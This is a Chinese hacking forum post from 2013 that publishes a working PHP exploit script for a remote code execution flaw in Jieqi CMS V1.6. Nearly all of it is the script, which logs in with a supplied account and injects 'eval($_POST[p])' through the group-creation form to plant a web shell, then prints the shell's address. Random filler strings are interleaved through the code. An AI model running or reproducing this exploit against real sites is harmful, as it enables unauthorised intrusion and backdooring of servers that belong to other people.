找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2243|回复: 0
打印 上一主题 下一主题

Jieqi(杰奇)CMS V1.6 PHP代码执行0day漏洞EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 11:28:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
, Z& S% K* K% u  q: P# v9 y; K4 m& o
2 l; x3 ]* w8 H
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。* q+ ^/ t) i/ A1 v" t2 z
需要有一个能创建圈子的用户。( u  j! z1 U% I$ u8 F9 Y# U: c

" u. C& e. X; S7 p3 M. x<?php' e! K' G% y. \4 H: G! p( @* p
/ ~4 s. B3 \. o: E0 K) G2 U
print_r('
! w8 G- e5 t" J+---------------------------------------------------------------------------+( _8 x9 _# ~1 c0 g  r
Jieqi CMS V1.6 PHP Code Injection Exploit6 ^: k3 r7 J/ E
by flyh4t0 _( ]/ r4 `; a* m' L
mail: phpsec at hotmail dot com* b" ?" ?/ c' A6 B9 Y. P! t$ }
team: http://www.wolvez.org
4 |0 l0 [8 z8 f: i3 R+---------------------------------------------------------------------------+& T# h* R' h. l3 o* E0 X6 p* T0 Q+ h
'); /**
! L! b! a# E" d% S% l7 h * works regardless of php.ini settings) d7 @" ?2 ^+ a3 P: k0 a
*/ if ($argc < 5) { print_r('
6 b5 A3 N6 Z( h! ]  \( l+---------------------------------------------------------------------------+
0 m# x2 ^. @$ e1 g" QUsage: php '.$argv[0].' host path username0 ^" c4 Q4 L+ F+ ~* j
host:      target server (ip/hostname)' g" w* J+ M, t0 ^9 M# z
path:      path to jieqicms
0 w' D! s# v4 e. vuasename:  a username who can create group# i! k! ^- p& K6 W& W
Example:
2 h1 L( B* d: S) b4 `php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password# U% w( b. W/ A' `. a& i9 J, r
+---------------------------------------------------------------------------+, q7 |6 Y' h5 y$ K! _( H
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
& C1 V: h* `& o( ~Content-Disposition: form-data; name="gname"
) H1 l( B7 M" |! ?6 \0 m% C0 A5 O , t; b5 L/ ?, a! ?' F& E+ N
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t8 Z1 |0 Y, Y: F6 z, z, O
-----------------------------232811682799613 N+ A% O2 L" ]  B
Content-Disposition: form-data; name="gcatid". W+ O3 Z& A: H5 t

* D' N2 P7 x. K- p  h: t. l# g1
: \. i$ H% I% Z( z& v3 x-----------------------------23281168279961
, t! c* s% @5 m5 r, \Content-Disposition: form-data; name="gaudit"# r5 S" {$ ^# p% T' d

7 J! E# U7 [1 w2 y' x5 E+ A5 {1
; q/ J/ D! i1 W1 G' K  u! ~-----------------------------23281168279961
6 T/ M* ~* ~  h9 cContent-Disposition: form-data; name="gbrief"% _0 @7 F1 e, n/ ]

' f7 [$ I4 B) O9 k! M1
0 A; n$ _( K5 e' c' [. J' v" ^1 u9 f, @-----------------------------23281168279961--' ]  s' F1 X: L" ~, i: |; i1 Y. x
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com( G- h; L8 z! Z: c$ Q5 V/ c- M( a( {
) j0 y1 N  h+ C5 z
preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url;
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表